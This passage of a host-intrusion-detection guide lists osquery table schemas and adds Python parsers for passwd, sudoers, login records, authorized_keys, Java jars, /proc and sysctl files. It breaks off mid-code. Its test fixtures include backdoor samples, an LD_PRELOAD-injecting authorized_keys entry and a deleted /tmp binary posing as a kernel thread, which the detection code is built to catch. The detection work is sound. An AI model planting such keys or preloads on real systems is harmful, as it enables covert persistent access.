Field Type Description
secure_boot INTEGER Whether secure boot is enabled
setup_mode INTEGER Whether setup mode is enabled

selinux_settings

Track active SELinux settings

Field Type Description
scope TEXT Where the key is located inside the SELinuxFS mount point.
key TEXT Key or class name.
value TEXT Active value

yara

Track YARA matches for files or PIDs

Field Type Description
path TEXT The path scanned
matches TEXT List of YARA matches
count INTEGER Number of YARA matches
sig_group TEXT Signature group used
sigfile TEXT Signature file used
sigrule TEXT Signature strings used
strings TEXT Matching strings
tags TEXT Matching tags
sigurl TEXT Signature url

l. Login information

authorized_keys

Line-delimited authorized_keys table

Field Type Description
uid BIGINT The local owner of authorized_keys file
algorithm TEXT algorithm of key
key TEXT parsed authorized keys line
key_file TEXT Path to the authorized_keys file
pid_with_namespace INTEGER Pids that contain a namespace

known_hosts

Line-delimited known_hosts table

Field Type Description
uid BIGINT The local user that owns the known_hosts file
key TEXT parsed known_hosts line
key_file TEXT Path to known_hosts file

last

System logins and logouts

Field Type Description
username TEXT Entry username
tty TEXT Entry terminal
pid INTEGER Process (or thread) ID
type INTEGER Entry type, according to ut_type types (utmp.h)
type_name TEXT Entry type name, according to ut_type types (utmp.h)
time INTEGER Entry timestamp
host TEXT Entry hostname

logged_in_users

Users with an active shell on the system

Field Type Description
type TEXT Login type
user TEXT User login name
tty TEXT Device name
host TEXT Remote hostname
time BIGINT Time entry was made
pid INTEGER Process (or thread) ID
sid TEXT The user’s unique security identifier
registry_hive TEXT HKEY_USERS registry hive

ssh_configs

A table of parsed ssh_config files

Field Type Description
uid BIGINT The local owner of the ssh_config file
block TEXT The host or match block
option TEXT The option and value
ssh_config_file TEXT Path to the ssh_config file

m. Scheduled tasks / startup items

startup_items

Applications and binaries set as user/login startup items

Field Type Description
name TEXT Name of startup item
path TEXT Path of startup item
args TEXT Arguments provided to startup executable
type TEXT Startup Item or Login Item
source TEXT Directory or plist containing startup item
status TEXT Startup status; either enabled or disabled
username TEXT The user associated with the startup item

crontab

Line-parsed values from system and user crontabs

Field Type Description
event TEXT The job @event name (rare)
minute TEXT The exact minute for the job
hour TEXT The hour of the day for the job
day_of_month TEXT The day of the month for the job
month TEXT The month of the year for the job
day_of_week TEXT The day of the week for the job
command TEXT Raw command string
path TEXT File parsed
pid_with_namespace INTEGER Pids that contain a namespace

n. System / kernel information

block_devices

Block (buffered access) device file nodes: disks, virtual disks and DMG containers

Field Type Description
name TEXT Block device name
parent TEXT Block device parent name
vendor TEXT Block device vendor string
model TEXT Block device model string identifier
size BIGINT Block device size in blocks
block_size INTEGER Block size in bytes
uuid TEXT Block device Universally Unique Identifier
type TEXT Block device type string
label TEXT Block device label string

cpu_time

Displays information from /proc/stat about the time the CPU cores have spent in different parts of the system

Field Type Description
core INTEGER Name of the cpu (core)
user BIGINT Time spent in user mode
nice BIGINT Time spent in user mode with low priority (nice)
system BIGINT Time spent in system mode
idle BIGINT Time spent in the idle task
iowait BIGINT Time spent waiting for I/O to complete
irq BIGINT Time spent servicing interrupts
softirq BIGINT Time spent servicing softirqs
steal BIGINT Time spent in other operating systems when running in a virtualized environment
guest BIGINT Time spent running a virtual CPU for a guest OS under the control of the Linux kernel
guest_nice BIGINT Time spent running a niced guest

cpuid

Useful CPU features from the cpuid ASM call

Field Type Description
feature TEXT Present feature flags
value TEXT Bit value or string
output_register TEXT Register used to for feature value
output_bit INTEGER Bit in register value for feature value
input_eax TEXT Value of EAX used

device_file

Similar to the file table, but uses TSK (The Sleuth Kit) and allows block address access

Field Type Description
device TEXT Absolute file path to device node
partition TEXT A partition number
path TEXT A logical path within the device node
filename TEXT Name portion of file path
inode BIGINT Filesystem inode number
uid BIGINT Owning user ID
gid BIGINT Owning group ID
mode TEXT Permission bits
size BIGINT Size of file in bytes
block_size INTEGER Block size of filesystem
atime BIGINT Last access time
mtime BIGINT Last modification time
ctime BIGINT Creation time
hard_links INTEGER Number of hard links
type TEXT File status

device_hash

Similar to the hash table, but uses TSK (The Sleuth Kit) and allows block address access

Field Type Description
device TEXT Absolute file path to device node
partition TEXT A partition number
inode BIGINT Filesystem inode number
md5 TEXT MD5 hash of provided inode data
sha1 TEXT SHA1 hash of provided inode data
sha256 TEXT SHA256 hash of provided inode data

kernel_info

Basic active kernel information

Field Type Description
version TEXT Kernel version
arguments TEXT Kernel arguments
path TEXT Kernel path
device TEXT Kernel device identifier

kernel_modules

Linux kernel modules that are loaded and within the load search path

Field Type Description
name TEXT Module name
size BIGINT Size of module content
used_by TEXT Module reverse dependencies
status TEXT Kernel module status
address TEXT Kernel module address

load_average

Displays information about the system-wide load averages

Field Type Description
period TEXT Period over which the average is calculated.
average TEXT Load average over the specified period.

mounts

System mounted devices and filesystems (not process specific)

Field Type Description
device TEXT Mounted device
device_alias TEXT Mounted device alias
path TEXT Mounted device path
type TEXT Mounted device type
blocks_size BIGINT Block size in bytes
blocks BIGINT Mounted device used blocks
blocks_free BIGINT Mounted device free blocks
blocks_available BIGINT Mounted device available blocks
inodes BIGINT Mounted device used inodes
inodes_free BIGINT Mounted device free inodes
flags TEXT Mounted device flags

os_version

A single row containing the operating system name and version

Field Type Description
name TEXT Distribution or product name
version TEXT Pretty, suitable for presentation, OS version
major INTEGER Major release version
minor INTEGER Minor release version
patch INTEGER Optional patch release
build TEXT Optional build-specific or variant string
platform TEXT OS Platform or ID
platform_like TEXT Closely related platforms
codename TEXT OS version codename
arch TEXT OS Architecture
install_date BIGINT The install date of the OS.
pid_with_namespace INTEGER Pids that contain a namespace
mount_namespace_id TEXT Mount namespace id

platform_info

Information about EFI/UEFI/ROM and platform/boot

Field Type Description
vendor TEXT Platform code vendor
version TEXT Platform code version
date TEXT Self-reported platform code update date
revision TEXT BIOS major and minor revision
address TEXT Relative address of firmware mapping
size TEXT Size in bytes of firmware
volume_size INTEGER (Optional) size of firmware volume
extra TEXT Platform-specific additional information

system_controls

sysctl names, values, and settings information

Field Type Description
name TEXT Full sysctl MIB name
oid TEXT Control MIB
subsystem TEXT Subsystem ID, control type
current_value TEXT Value of setting
config_value TEXT The MIB value set in /etc/sysctl.conf
type TEXT Data type
field_name TEXT Specific attribute of opaque type

system_info

System information for identification

Field Type Description
hostname TEXT Network hostname including domain
uuid TEXT Unique ID provided by the system
cpu_type TEXT CPU type
cpu_subtype TEXT CPU subtype
cpu_brand TEXT CPU brand string, contains vendor and model
cpu_physical_cores INTEGER Number of physical CPU cores in the system
cpu_logical_cores INTEGER Number of logical CPU cores available to the system
cpu_microcode TEXT Microcode version
physical_memory BIGINT Total physical memory in bytes
hardware_vendor TEXT Hardware vendor
hardware_model TEXT Hardware model
hardware_version TEXT Hardware version
hardware_serial TEXT Device serial number
board_vendor TEXT Board vendor
board_model TEXT Board model
board_version TEXT Board version
board_serial TEXT Board serial number
computer_name TEXT Friendly computer name (optional)
local_hostname TEXT Local hostname (optional)

systemd_units

Track systemd units

Field Type Description
id TEXT Unique unit identifier
description TEXT Unit description
load_state TEXT Reflects whether the unit definition was properly loaded
active_state TEXT The high-level unit activation state, i.e. generalization of SUB
sub_state TEXT The low-level unit activation state, values depend on unit type
following TEXT The name of another unit that this unit follows in state
object_path TEXT The object path for this unit
job_id BIGINT Next queued job id
job_type TEXT Job type
job_path TEXT The object path for the job
fragment_path TEXT The unit file path this unit was read from, if there is any
user TEXT The configured user, if any
source_path TEXT Path to the (possibly generated) unit configuration file

ulimit_info

System resource usage limits

Field Type Description
type TEXT System resource to be limited
soft_limit TEXT Current limit value
hard_limit TEXT Maximum limit value

uptime

Track time passed since last boot

Field Type Description
days INTEGER Days of uptime
hours INTEGER Hours of uptime
minutes INTEGER Minutes of uptime
seconds INTEGER Seconds of uptime
total_seconds BIGINT Total uptime seconds

3. Elkeid data items

a. User-space data

b. Kernel-space data

Both lists are given only as the diagram in the reference below; refer: https://github.com/bytedance/Elkeid/blob/main/png/data1.png

0x02 Data collection techniques

Basic information

1. System version

Parse the distribution-specific release file, e.g. /etc/issue, /etc/redhat-release or /etc/gentoo-release, to collect the system version (on modern distributions /etc/os-release is the standard machine-readable source and should be tried first)

2. Kernel information

Parse /proc/cmdline and /proc/version

3. User information

Collect user information from /etc/passwd, dropping accounts whose shell is nologin

sudoers information: parse /etc/sudoers and the files under /etc/sudoers.d/
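
The passwd and sudoers collection described above, written out as an added example (it is not the page's or any project's code). It runs on constructed sample text rather than the real files, applies the nologin filter the text mentions, follows backslash continuation and @includedir in sudoers, and adds two checks a practitioner wants from this data: extra uid-0 accounts and passwordless full sudo. All function and constant names are my own.

```python
"""Collect local accounts and sudo rules from passwd/sudoers text.

Added example, not the page's own code. It runs on constructed sample text
so it works offline; on a host, read /etc/passwd, /etc/sudoers and every
file under /etc/sudoers.d and feed the contents to the same functions.
"""
import re

# Constructed sample input (not captured from a real host).
PASSWD_SAMPLE = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
alice:x:1000:1000:Alice:/home/alice:/bin/bash
toor:x:0:0::/root:/bin/sh
svc:x:1001:1001::/var/lib/svc:/bin/false
"""

SUDOERS_SAMPLE = """\
Defaults        env_reset
# User privilege specification
root    ALL=(ALL:ALL) ALL
%sudo   ALL=(ALL:ALL) ALL
alice   ALL=(ALL) NOPASSWD: ALL
svc     ALL=(root) NOPASSWD: /usr/bin/systemctl restart svc, \\
        /usr/bin/journalctl
@includedir /etc/sudoers.d
"""

NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false"}


def parse_passwd(text):
    """Parse passwd(5) lines; accounts whose shell cannot log in are dropped."""
    users = []
    for line in text.splitlines():
        if not line or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            continue  # malformed line: skip it rather than abort the whole scan
        name, _pw, uid, gid, gecos, home, shell = fields
        if shell in NOLOGIN_SHELLS:
            continue
        users.append({"username": name, "uid": int(uid), "gid": int(gid),
                      "description": gecos, "directory": home, "shell": shell})
    return users


def find_extra_root_accounts(users):
    """Any uid-0 account other than root is a classic backdoor indicator."""
    return [u["username"] for u in users if u["uid"] == 0 and u["username"] != "root"]


SPEC_RE = re.compile(r"^(\S+)\s+(\S+)\s*=\s*(?:\(([^)]*)\)\s*)?(.*)$")
TAG_RE = re.compile(r"\b(NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV):")


def parse_sudoers(text):
    """Parse user-specification lines from sudoers(5).

    Handles backslash line continuation, comments, Defaults/alias lines, and
    @include/@includedir directives (returned separately so the caller can
    walk the included files with the same parser).
    """
    rules, includes = [], []
    logical = re.sub(r"\\\n\s*", " ", text)  # join continued lines first
    for line in logical.splitlines():
        line = line.strip()
        if line.startswith(("@include", "#include")):
            parts = line.split(None, 1)
            if len(parts) == 2:
                includes.append(parts[1])
            continue
        if not line or line.startswith("#"):
            continue
        first = line.split(None, 1)[0]
        if first.startswith("Defaults") or first.endswith("_Alias"):
            continue  # options and aliases are not privilege rules
        m = SPEC_RE.match(line)
        if not m:
            continue
        who, hosts, runas, cmds = m.groups()
        tags = TAG_RE.findall(cmds)
        commands = [c.strip() for c in TAG_RE.sub("", cmds).split(",") if c.strip()]
        rules.append({"user": who, "hosts": hosts, "runas": runas or "root",
                      "tags": tags, "commands": commands})
    return rules, includes


def passwordless_full_sudo(rules):
    """Rules granting any command without a password: worth an alert."""
    return [r["user"] for r in rules
            if "NOPASSWD" in r["tags"] and "ALL" in r["commands"]]
```

The parser deliberately ignores Defaults and alias lines instead of guessing at them; a full sudoers grammar also needs alias expansion, which an agent can leave to the analysis side once the raw rule lines are shipped.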

4. Login information

Log file Description
/var/log/secure Records user login authentication and authorization on RHEL-family systems; every program that handles accounts and passwords logs here
/var/log/auth.log Records system authorization information on Debian-family systems, such as user logins and the privilege mechanisms used
/var/log/btmp Records failed login attempts; it is a binary file that cannot be read with vi, use the lastb command
/var/log/lastlog Records the last login time of every user on the system; use the lastlog command
/var/log/wtmp Permanent record of all user logins and logouts, plus system boot, reboot and shutdown events; use the last command
/var/run/utmp Records the users currently logged in (/run/utmp on systemd-based systems); query with w, who or users
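
wtmp, btmp and utmp share one binary record format, so an agent that wants the data behind last, lastb and who without spawning those tools decodes the records itself. The following is an added example (not the page's or any project's code) that decodes the glibc x86_64 layout from utmp(5); the records it parses are packed in memory, and the brute-force check at the end is the kind of thing one runs over btmp. Names are my own.

```python
"""Decode utmp/wtmp/btmp records (glibc x86_64 layout, 384 bytes each).

Added example, not the page's own code. The sample below is packed in memory
with struct so the script runs offline; on a host, read /var/log/wtmp,
/var/log/btmp or /run/utmp and pass the bytes to parse_utmp().
"""
import socket
import struct

# struct utmp as laid out by glibc on x86_64 (utmp(5)): little-endian, fixed-width
# fields, two padding bytes after ut_type, 32-bit ut_tv fields for compatibility.
UTMP_FMT = "<hxxi32s4s32s256shhiii4i20x"
UTMP_SIZE = struct.calcsize(UTMP_FMT)  # 384

UT_TYPES = {0: "EMPTY", 1: "RUN_LVL", 2: "BOOT_TIME", 3: "NEW_TIME", 4: "OLD_TIME",
            5: "INIT_PROCESS", 6: "LOGIN_PROCESS", 7: "USER_PROCESS",
            8: "DEAD_PROCESS", 9: "ACCOUNTING"}


def _cstr(raw):
    """NUL-terminated fixed-width field to str."""
    return raw.split(b"\0", 1)[0].decode("utf-8", "replace")


def parse_utmp(data):
    """Return one dict per non-empty record; a truncated tail is ignored."""
    records = []
    for off in range(0, len(data) - UTMP_SIZE + 1, UTMP_SIZE):
        (ut_type, pid, line, _ut_id, user, host, _e_term, _e_exit, _session,
         tv_sec, _tv_usec, a0, a1, a2, a3) = struct.unpack_from(UTMP_FMT, data, off)
        if ut_type == 0:
            continue
        # ut_addr_v6: an IPv4 peer occupies only the first word, IPv6 all four.
        if a1 == a2 == a3 == 0:
            addr = socket.inet_ntoa(struct.pack("<i", a0)) if a0 else ""
        else:
            addr = socket.inet_ntop(socket.AF_INET6, struct.pack("<4i", a0, a1, a2, a3))
        records.append({"type": ut_type, "type_name": UT_TYPES.get(ut_type, "UNKNOWN"),
                        "pid": pid, "tty": _cstr(line), "username": _cstr(user),
                        "host": _cstr(host), "addr": addr, "time": tv_sec})
    return records


def make_record(ut_type, pid, line, user, host, tv_sec, ipv4=""):
    """Pack one record the way login(1)/sshd write it; used for the sample."""
    a0 = struct.unpack("<i", socket.inet_aton(ipv4))[0] if ipv4 else 0
    return struct.pack(UTMP_FMT, ut_type, pid, line.encode(), b"", user.encode(),
                       host.encode(), 0, 0, 0, tv_sec, 0, a0, 0, 0, 0)


def failed_logins_by_host(records, threshold):
    """For btmp (every record is a failed attempt): hosts at or above threshold."""
    counts = {}
    for rec in records:
        counts[rec["host"]] = counts.get(rec["host"], 0) + 1
    return {host: n for host, n in counts.items() if n >= threshold}


# Constructed sample: one interactive login, three failed attempts from one
# host (what btmp holds), and a trailing all-zero record.
SAMPLE_WTMP = (
    make_record(7, 4242, "pts/0", "alice", "10.0.0.5", 1700000000, ipv4="10.0.0.5")
    + make_record(6, 4300, "ssh:notty", "root", "203.0.113.9", 1700000100, ipv4="203.0.113.9") * 3
    + b"\0" * UTMP_SIZE
)

if __name__ == "__main__":
    for rec in parse_utmp(SAMPLE_WTMP):
        print(rec["type_name"], rec["username"], rec["tty"], rec["host"], rec["time"])
    print(failed_logins_by_host(parse_utmp(SAMPLE_WTMP)[1:], 3))
```

The layout is architecture-specific (32-bit and non-glibc systems differ), so an agent should check that the file size is a multiple of the record size before trusting the decode; the loop above also tolerates a partially written last record, which is common on a file that is being appended to while it is read.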

5. Process information

Walk the /proc directory to obtain information on every process

refer: http://man7.org/linux/man-pages/man5/proc.5.html

6. Environment variables

Switch to each user and run the following commands:

- set displays the variables of the current shell, including the current user's variables;
- env displays the current user's environment variables;
- export displays the shell variables that have been exported as environment variables

An agent normally reads /proc/[pid]/environ for each process instead of spawning shells as each user; that is what osquery's process_envs table does, and it also captures variables of already running processes that a fresh shell would not show.

7. Scheduled tasks

/etc/crontab		# system-wide crontab
/var/spool/cron/ # directory holding per-user crontabs
/etc/cron.d/ # system, all distributions
/var/at/tabs/ # user, macOS
/var/spool/cron/ # user, RHEL/CentOS
/var/spool/cron/crontabs/ # user, Debian/Ubuntu

The /etc/cron.hourly, /etc/cron.daily, /etc/cron.weekly and /etc/cron.monthly directories (run via run-parts) and systemd timer units (systemctl list-timers) are not covered by the crontab files and need to be collected separately.

8. authorized_keys information

Walk every user's home directory and read the ".ssh/authorized_keys" and ".ssh/authorized_keys2" files (if sshd_config sets AuthorizedKeysFile to other paths, those need to be collected too)

known_hosts file: walk the .ssh/known_hosts file in every user's home directory
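
Parsing an authorized_keys line is mostly about the optional leading options word, which can contain quoted commas and spaces and is exactly where a planted key carries its payload (a forced command, an environment override). The following is an added example (not the page's or any project's code) that parses constructed lines into the shape of the authorized_keys table above and flags option-bearing entries; names are my own.

```python
"""Parse authorized_keys files, including the options prefix.

Added example, not the page's own code. Input is constructed text; on a
host, walk every home directory from /etc/passwd and read
.ssh/authorized_keys and .ssh/authorized_keys2 (plus any AuthorizedKeysFile
paths from sshd_config) and pass each file to parse_authorized_keys().
"""
import re

KEY_TYPES = ("ssh-rsa", "ssh-dss", "ssh-ed25519", "sk-ssh-ed25519@openssh.com",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521",
             "sk-ecdsa-sha2-nistp256@openssh.com")
BASE64_RE = re.compile(r"[A-Za-z0-9+/]+={0,2}")

# Constructed sample; the key material is placeholder base64, not real keys.
AUTHORIZED_KEYS_SAMPLE = """\
# alice's laptop
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIPLACEHOLDER alice@laptop
from="10.0.0.0/8",no-pty,command="/usr/bin/rrsync /srv/backup" ssh-rsa AAAAB3NzaC1yc2EPLACEHOLDER backup@nas
environment="LD_PRELOAD=/tmp/.x.so" ssh-rsa AAAAB3NzaC1yc2EPLACEHOLDER2
ssh-rsa   # truncated line, must be rejected
"""


def _split_options(line):
    """Split off the leading options word, honouring quotes so the commas and
    spaces inside command="a b,c" are not treated as separators."""
    opts, buf, quoted, i = [], "", False, 0
    while i < len(line):
        c = line[i]
        if c == '"':
            quoted = not quoted
        elif c == "\\" and quoted and i + 1 < len(line):
            buf += line[i + 1]
            i += 2
            continue
        elif c == "," and not quoted:
            opts.append(buf)
            buf = ""
            i += 1
            continue
        elif c in " \t" and not quoted:
            break
        buf += c
        i += 1
    opts.append(buf)
    return opts, line[i:].lstrip()


def parse_authorized_keys(text, key_file, uid):
    """One dict per valid key line; anything we cannot parse is dropped, never guessed."""
    entries = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        options = []
        if not line.startswith(KEY_TYPES):
            options, line = _split_options(line)
        parts = line.split(None, 2)
        if len(parts) < 2 or parts[0] not in KEY_TYPES or not BASE64_RE.fullmatch(parts[1]):
            continue
        entries.append({"uid": uid, "algorithm": parts[0], "key": parts[1],
                        "comment": parts[2] if len(parts) > 2 else "",
                        "options": options, "key_file": key_file})
    return entries


def option_bearing_entries(entries):
    """Entries whose options execute something or alter the login environment.

    command= is usually a legitimate restriction but is also how a backdoor key
    hides its payload; environment= (with PermitUserEnvironment) can preload code.
    """
    findings = []
    for entry in entries:
        for opt in entry["options"]:
            if opt.startswith(("command=", "environment=")):
                findings.append((entry["comment"] or entry["key"][:16], opt))
    return findings
```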

9. Third-party component information

The most common third-party components are Java libraries.

1) Walk the jar files under the web server's library paths. For war deployments, unpack the war first and then walk its .jar files in the same way to get the name and version of each third-party component.

2) Another way is to parse the web application's pom.xml (not every Java web application ships one); its `` tag manages the third-party component information
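The jar/war walk from step 1, as an added example (not the page's or any project's code). A war is itself a zip, so the nested jars are read in memory instead of being unpacked to disk, and each jar is identified from the Maven pom.properties it carries, falling back to the name-version pattern in the filename. The fixture is built in a temp directory so the script runs offline; names are my own.

```python
"""Inventory Java third-party components from jar files, descending into wars.

Added example, not the page's own code. It builds a throwaway webapps layout
(one jar, one war with a nested jar) in a temp directory so it runs offline;
point scan_path() at a real lib or webapps directory on a host.
"""
import io
import os
import re
import tempfile
import zipfile

# Maven-built jars carry META-INF/maven/<group>/<artifact>/pom.properties
POM_PROPS = re.compile(r"^META-INF/maven/[^/]+/[^/]+/pom\.properties$")
# Fallback: <name>-<version>.jar, e.g. commons-text-1.9.jar
NAME_VERSION = re.compile(r"^(.+?)-(\d[\w.+-]*)\.jar$")


def _props(data):
    out = {}
    for line in data.decode("utf-8", "replace").splitlines():
        if "=" in line and not line.startswith("#"):
            key, value = line.split("=", 1)
            out[key.strip()] = value.strip()
    return out


def components_from_jar(fileobj, name):
    """Return (groupId, artifactId, version) triples described by one jar."""
    found = []
    with zipfile.ZipFile(fileobj) as zf:
        for member in zf.namelist():
            if POM_PROPS.match(member):
                props = _props(zf.read(member))
                if all(k in props for k in ("groupId", "artifactId", "version")):
                    found.append((props["groupId"], props["artifactId"], props["version"]))
    if not found:  # no Maven metadata: fall back to the filename
        m = NAME_VERSION.match(os.path.basename(name))
        if m:
            found.append(("", m.group(1), m.group(2)))
    return found


def components_from_war(fileobj):
    """A war is a zip; its WEB-INF/lib/*.jar entries are scanned in memory."""
    found = []
    with zipfile.ZipFile(fileobj) as zf:
        for member in zf.namelist():
            if member.startswith("WEB-INF/lib/") and member.endswith(".jar"):
                found.extend(components_from_jar(io.BytesIO(zf.read(member)), member))
    return found


def scan_path(root):
    """{archive path: [components]} for every jar/war below root."""
    results = {}
    for dirpath, _dirs, files in os.walk(root):
        for fn in files:
            full = os.path.join(dirpath, fn)
            try:
                with open(full, "rb") as fh:
                    if fn.endswith(".jar"):
                        results[full] = components_from_jar(fh, fn)
                    elif fn.endswith(".war"):
                        results[full] = components_from_war(fh)
            except zipfile.BadZipFile:
                results[full] = []  # corrupt archive: record it and keep scanning
    return results


def build_sample_webapps(root):
    """Constructed fixture: a standalone Maven jar and a war nesting a plain jar."""
    lib = os.path.join(root, "lib")
    os.makedirs(lib)
    props = b"groupId=org.apache.logging.log4j\nartifactId=log4j-core\nversion=2.17.1\n"
    with zipfile.ZipFile(os.path.join(lib, "log4j-core-2.17.1.jar"), "w") as jar:
        jar.writestr("META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties", props)
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as jar:  # no pom.properties: filename fallback
        jar.writestr("com/example/Util.class", b"\xca\xfe\xba\xbe")
    with zipfile.ZipFile(os.path.join(root, "app.war"), "w") as war:
        war.writestr("WEB-INF/lib/commons-text-1.9.jar", inner.getvalue())


def demo():
    """Build the fixture in a temp dir, scan it, return {basename: components}."""
    with tempfile.TemporaryDirectory() as tmp:
        build_sample_webapps(tmp)
        return {os.path.basename(k): v for k, v in scan_path(tmp).items()}
```

Shaded or repackaged jars bundle several pom.properties, which is why a jar maps to a list rather than a single triple; those embedded components are exactly the ones a filename-only inventory misses.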

10. Web server information

From the monitored process list, filter out the processes whose command line runs a web server such as nginx|httpd|apache|tomcat|weblogic|jboss|jetty.

Walk /proc/[pid]/cmdline and /proc/[pid]/cwd to collect the web server's version and the path of its web code
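
The /proc walk from section 5 and the web-server filter from section 10 consume the same per-process data, so one added example covers both (it is not the page's or any project's code). It reads status, cmdline, exe and cwd for each numeric /proc entry, records the on_disk state that osquery's processes table exposes (an exe link ending in " (deleted)" means the binary was removed after exec), then picks out web servers with a version hint and web root. A fake /proc tree is built in a temp directory so it runs offline; names are my own.

```python
"""Enumerate processes from a /proc tree and pick out web servers.

Added example, not the page's own code. It constructs a fake /proc tree in a
temp directory (status, cmdline, exe and cwd per pid) so it runs offline;
on a host call collect_processes("/proc").
"""
import os
import re
import tempfile

# Priority order matters: a Tomcat command line also contains "apache".
WEBSERVERS = [("tomcat", r"tomcat|catalina"), ("weblogic", r"weblogic"),
              ("jboss", r"jboss|wildfly"), ("jetty", r"jetty"),
              ("nginx", r"\bnginx\b"), ("apache", r"\bhttpd\b|\bapache2?\b")]
VERSION_RE = re.compile(r"\b\d+\.\d+(?:\.\d+)?\b")


def _read(path, default=""):
    try:
        with open(path, "rb") as fh:
            return fh.read().decode("utf-8", "replace")
    except OSError:
        return default  # process exited mid-scan, or we lack permission


def _status_fields(text):
    fields = {}
    for line in text.splitlines():
        if ":" in line:
            key, value = line.split(":", 1)
            fields[key.strip()] = value.strip()
    return fields


def collect_processes(proc_root):
    procs = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        base = os.path.join(proc_root, entry)
        status = _status_fields(_read(os.path.join(base, "status")))
        argv = [a for a in _read(os.path.join(base, "cmdline")).split("\0") if a]
        try:
            exe = os.readlink(os.path.join(base, "exe"))
        except OSError:
            exe = ""  # kernel thread, or unreadable without ptrace access
        try:
            cwd = os.readlink(os.path.join(base, "cwd"))
        except OSError:
            cwd = ""
        # " (deleted)" on the exe link: the binary was removed or replaced after exec.
        on_disk = 0 if exe.endswith(" (deleted)") else (1 if exe else -1)
        uids = status.get("Uid", "").split()
        procs.append({"pid": int(entry), "name": status.get("Name", ""),
                      "parent": int(status.get("PPid", "0") or 0),
                      "uid": int(uids[0]) if uids else -1,
                      "euid": int(uids[1]) if len(uids) > 1 else -1,
                      "path": exe.replace(" (deleted)", ""), "cmdline": " ".join(argv),
                      "cwd": cwd, "on_disk": on_disk})
    return sorted(procs, key=lambda p: p["pid"])


def find_web_servers(procs):
    """Web server processes with a version hint from argv and cwd as the likely web root."""
    hits = []
    for proc in procs:
        for server, pattern in WEBSERVERS:
            if re.search(pattern, proc["cmdline"], re.I):
                version = VERSION_RE.search(proc["cmdline"])
                hits.append({"pid": proc["pid"], "server": server,
                             "version_hint": version.group(0) if version else "",
                             "web_root": proc["cwd"], "on_disk": proc["on_disk"]})
                break
    return hits


# Constructed fixture: (pid, name, ppid, uid, argv, exe target, cwd target).
SAMPLE_PROCS = [
    (1, "systemd", 0, 0, ["/sbin/init"], "/usr/lib/systemd/systemd", "/"),
    (812, "nginx", 1, 0, ["nginx:", "master", "process", "/usr/sbin/nginx"], "/usr/sbin/nginx", "/"),
    (2201, "java", 1, 1001, ["/usr/bin/java", "-Dcatalina.base=/opt/apache-tomcat-9.0.65",
                             "org.apache.catalina.startup.Bootstrap"],
     "/usr/lib/jvm/bin/java", "/opt/apache-tomcat-9.0.65"),
    (3120, "kworker", 1, 0, [".x"], "/tmp/.x (deleted)", "/tmp"),
]


def build_fake_proc(root, procs):
    for pid, name, ppid, uid, argv, exe, cwd in procs:
        d = os.path.join(root, str(pid))
        os.makedirs(d)
        with open(os.path.join(d, "status"), "w") as fh:
            fh.write(f"Name:\t{name}\nState:\tS (sleeping)\nPid:\t{pid}\nPPid:\t{ppid}\n"
                     f"Uid:\t{uid}\t{uid}\t{uid}\t{uid}\n")
        with open(os.path.join(d, "cmdline"), "wb") as fh:
            fh.write(b"\0".join(a.encode() for a in argv) + b"\0")  # NUL-separated, NUL-terminated
        os.symlink(exe, os.path.join(d, "exe"))
        os.symlink(cwd, os.path.join(d, "cwd"))
    os.makedirs(os.path.join(root, "sys"))  # non-pid entries must be ignored


def demo():
    with tempfile.TemporaryDirectory() as tmp:
        build_fake_proc(tmp, SAMPLE_PROCS)
        procs = collect_processes(tmp)
        return procs, find_web_servers(procs)
```

The version hint is only the first x.y[.z] token in argv; on a real host the agent confirms it by running the binary with its version flag or by reading the server's own version file under the web root. Note pid 3120 in the fixture: a process named like a kernel thread whose executable lived in /tmp and is gone, which the on_disk field surfaces directly.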

11. System control files

Parse the system control configuration file /etc/sysctl.conf

Other locations where sysctl configuration files may exist, in the order sysctl --system searches them (sysctl.d(5)); a file in an earlier directory shadows a later file with the same name, and /etc/sysctl.conf is applied last:

/etc/sysctl.d/*.conf
/run/sysctl.d/*.conf
/usr/local/lib/sysctl.d/*.conf
/usr/lib/sysctl.d/*.conf
/lib/sysctl.d/*.conf
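
Collecting these files one by one is not enough: the value the kernel actually gets depends on the shadowing and ordering rules above. The following added example (not the page's or any project's code) resolves the effective configuration the way sysctl --system does and then checks a handful of kernel hardening keys against expected values. The directory layout is constructed in a temp directory so it runs offline; the expected values and the names are my own.

```python
"""Resolve the effective sysctl configuration the way sysctl --system does,
then check a few kernel hardening keys.

Added example, not the page's own code. The directory layout is constructed
in a temp dir so it runs offline; on a host call load_sysctl_config() with
no arguments to use the search path from sysctl.d(5).
"""
import os
import tempfile

# sysctl.d(5): earlier directories shadow later ones by basename; the chosen
# files are applied in basename order and /etc/sysctl.conf is applied last.
DEFAULT_SEARCH = ["/etc/sysctl.d", "/run/sysctl.d", "/usr/local/lib/sysctl.d",
                  "/usr/lib/sysctl.d", "/lib/sysctl.d"]

# key: (expected value, why a weaker value matters). Illustrative baseline, not a standard.
EXPECTED = {
    "kernel.kptr_restrict": ("2", "kernel pointers readable by unprivileged users"),
    "kernel.dmesg_restrict": ("1", "dmesg exposes kernel addresses and driver details"),
    "kernel.yama.ptrace_scope": ("1", "any process may ptrace same-uid processes"),
    "net.ipv4.conf.all.accept_redirects": ("0", "ICMP redirects allow route hijacking"),
    "fs.protected_symlinks": ("1", "symlink races in world-writable directories"),
}


def parse_sysctl_file(path):
    """[(key, value, ignore_errors)]; a leading '-' tells sysctl to ignore a missing key."""
    out = []
    with open(path) as fh:
        for raw in fh:
            line = raw.strip()
            if not line or line[0] in "#;" or "=" not in line:
                continue
            key, value = (s.strip() for s in line.split("=", 1))
            ignore = key.startswith("-")
            key = key.lstrip("-").replace("/", ".")  # sysctl accepts both separators
            out.append((key, value, ignore))
    return out


def resolve_config_files(search_dirs, sysctl_conf):
    """Apply basename shadowing across search_dirs, sort by basename, append sysctl.conf."""
    chosen = {}
    for directory in search_dirs:  # earlier directories win
        if not os.path.isdir(directory):
            continue
        for fn in os.listdir(directory):
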